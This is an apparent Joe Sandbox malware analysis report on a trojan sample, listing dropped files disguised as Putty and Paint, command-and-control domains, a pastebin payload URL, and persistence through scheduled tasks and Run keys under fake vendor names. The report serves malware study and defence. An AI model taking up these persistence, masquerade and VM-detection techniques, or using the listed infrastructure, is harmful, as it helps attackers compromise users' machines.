xdwdPutty.exe 64->80         started        82 cmd.exe 64->82         started        88 3 other processes 64->88 114 C:\Users\user\Videos\xdwdPutty.exe, PE32 68->114 dropped 138 Queries memory information (via WMI often done to detect virtual machines) 68->138 84 cmd.exe 68->84         started        86 Conhost.exe 68->86         started        signatures13 process14 process15 90 Conhost.exe 76->90         started        92 conhost.exe 78->92         started        94 schtasks.exe 78->94         started        96 cmd.exe 80->96         started        98 conhost.exe 82->98         started        100 conhost.exe 84->100         started        102 schtasks.exe 84->102         started        104 conhost.exe 88->104         started        106 Conhost.exe 88->106         started        process16 108 conhost.exe 96->108         started        110 Conhost.exe 98->110         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ptKNiAaGus.exe83%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
ptKNiAaGus.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe100%AviraTR/Crypt.OPACK.Gen
C:\Users\user\xdwdPutty.exe100%AviraTR/Crypt.OPACK.Gen
C:\Users\user\Videos\xdwdPutty.exe100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://pastebin.com/raw/LmbvnzZ0%Avira URL Cloudsafe
https://pastebin.com/raw/LmbvnzZM0%Avira URL Cloudsafe
https://pastebin.com/raw/Lmbvnz0%Avira URL Cloudsafe
https://pastebin.com/raw/Lm0%Avira URL Cloudsafe
https://pastebin.com/raw/Lmbvn0%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
https://pastebin.com/raw0%Avira URL Cloudsafe
https://pastebin.com/raw/Lmb0%Avira URL Cloudsafe
https://pastebin.c0%Avira URL Cloudsafe
https://pastebin.com/raw/Lmbv0%Avira URL Cloudsafe
https://ocsp.quovadi0%Avira URL Cloudsafe
https://pastebin.com/raw/0%Avira URL Cloudsafe
http://icanhazip.com/0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
https://pastebin.com/r0%Avira URL Cloudsafe
https://pastebin.com/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
https://pastebin.com/ra0%Avira URL Cloudsafe
https://pastebin.com0%Avira URL Cloudsafe
https://pastebin.com/raw/L0%Avira URL Cloudsafe
https://pastebin.co0%Avira URL Cloudsafe
https://aka.ms/odirm=C:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
q-policies.gl.at.ply.gg
147.185.221.18
truetrue
    		unknown
    pastebin.com
    		104.20.3.235
    		truetrue
      		unknown
      icanhazip.com
      		104.16.185.241
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://pastebin.com/raw/LmbvnzZMfalse
        • Avira URL Cloud: safe
        		unknown
        http://icanhazip.com/false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://pastebin.cxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmbxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmbvnzZxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmbvnxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/rawxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmbvnzxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LmbvxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.quovadis.bm0ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://ocsp.quovadipto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/rxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://ocsp.quovadisoffshore.com0ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.000000000292B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.000000000276B000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raw/LxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.comxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.com/raxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://pastebin.coxdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/odirm=C:xdwdMicrosoft Paint.exe, 00000011.00000002.1199190845.000000001C0A2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        104.20.3.235
        		pastebin.comUnited States
        		13335CLOUDFLARENETUStrue
        104.16.185.241
        		icanhazip.comUnited States
        		13335CLOUDFLARENETUSfalse
        147.185.221.18
        		q-policies.gl.at.ply.ggUnited States
        		12087SALSGIVERUStrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1466956
        Start date and time:2024-07-03 15:48:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 16m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected VM Detection
        Number of analysed new started processes analysed:158
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Sample name:ptKNiAaGus.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@196/11@4/3
        EGA Information:
        • Successful, ratio: 11.1%
        HCA Information:
        • Successful, ratio: 60%
        • Number of executed functions: 451
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption

        Warnings

        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, WmiApSrv.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com
        • Execution Graph export aborted for target pto2q1ow.nf5.exe, PID 10036 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 8500 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 9720 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 9912 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 10220 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 2812 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 8872 because it is empty
        • Execution Graph export aborted for target z4wwumki.3zg.exe, PID 6424 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: ptKNiAaGus.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:50:07API Interceptor8516862x Sleep call for process: ptKNiAaGus.exe modified
        09:50:30API Interceptor9x Sleep call for process: powershell.exe modified
        09:50:32API Interceptor6305597x Sleep call for process: pto2q1ow.nf5.exe modified
        09:50:32API Interceptor3x Sleep call for process: xdwdMicrosoft Paint.exe modified
        09:50:36API Interceptor2x Sleep call for process: z4wwumki.3zg.exe modified
        09:50:38API Interceptor6x Sleep call for process: xdwdPutty.exe modified
        15:50:07Task SchedulerRun new task: Avast Antivirus path: C:\Users\user\xdwdPutty.exe
        15:50:30Task SchedulerRun new task: Google Drive path: C:\Users\user\AppData\Roaming\xdwdMicrosoft s>Paint.exe
        15:50:33Task SchedulerRun new task: OpenOffice path: C:\Users\user\Videos\xdwdMicrosoft s>PowerPoint Host.exe
        15:50:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
        15:50:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
        15:50:58Task SchedulerRun new task: Corel PaintShop Pro path: C:\Users\user\Videos\xdwdPutty.exe
        15:51:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio C:\Users\user\Videos\xdwdPutty.exe
        15:51:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio C:\Users\user\Videos\xdwdPutty.exe

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.20.3.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        104.16.185.241bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
        • icanhazip.com/
        PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
        • icanhazip.com/
        Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
        • icanhazip.com/
        w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
        • icanhazip.com/
        wssvZm9dNK.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
        • icanhazip.com/
        INQUIRY.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        Order Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        Hniunx426q.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWormBrowse
        • icanhazip.com/
        171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        147.185.221.18beK7HmoXro.exeGet hashmaliciousUnknownBrowse
          bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
              V6363OW8Rh.exeGet hashmaliciousXWormBrowse
                x6221haMsm.exeGet hashmaliciousUnknownBrowse
                  a.exeGet hashmaliciousUnknownBrowse
                    wzcstatus.exeGet hashmaliciousUnknownBrowse
                      wzcsapi.exeGet hashmaliciousXWormBrowse
                        bKwh3xPyu9.exeGet hashmaliciousQuasarBrowse
                          pSZnQqzOqX.exeGet hashmaliciousXWormBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            q-policies.gl.at.ply.ggbeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            x6221haMsm.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            pastebin.combeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            s8Z4L8DY65.exeGet hashmaliciousXWormBrowse
                            • 104.20.3.235
                            bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            x6221haMsm.exeGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                            • 172.67.19.24
                            20240506_12082.xlsGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                            • 104.20.3.235
                            Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                            • 104.20.3.235
                            d5raNaLQ8Q.exeGet hashmaliciousXmrigBrowse
                            • 104.20.3.235
                            icanhazip.combeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
                            bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                            • 104.16.185.241
                            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
                            • 104.16.185.241
                            x6221haMsm.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
                            Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                            • 104.16.185.241
                            a.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
                            Bd8Za055cP.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
                            zrrHgsDzgS.exeGet hashmaliciousAsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRATBrowse
                            • 104.16.184.241
                            H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                            • 104.16.184.241
                            w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
                            • 104.16.185.241

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSQuarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.148.54
                            1hibLFnCm1.exeGet hashmaliciousDCRatBrowse
                            • 104.21.90.190
                            beK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
                            https://uglb4.roperelo.com/caGPey/Get hashmaliciousUnknownBrowse
                            • 104.17.2.184
                            tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 104.26.13.205
                            https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                            • 188.114.96.3
                            https://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqgGet hashmaliciousHTMLPhisherBrowse
                            • 1.1.1.1
                            CLOUDFLARENETUSQuarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.148.54
                            1hibLFnCm1.exeGet hashmaliciousDCRatBrowse
                            • 104.21.90.190
                            beK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 104.16.184.241
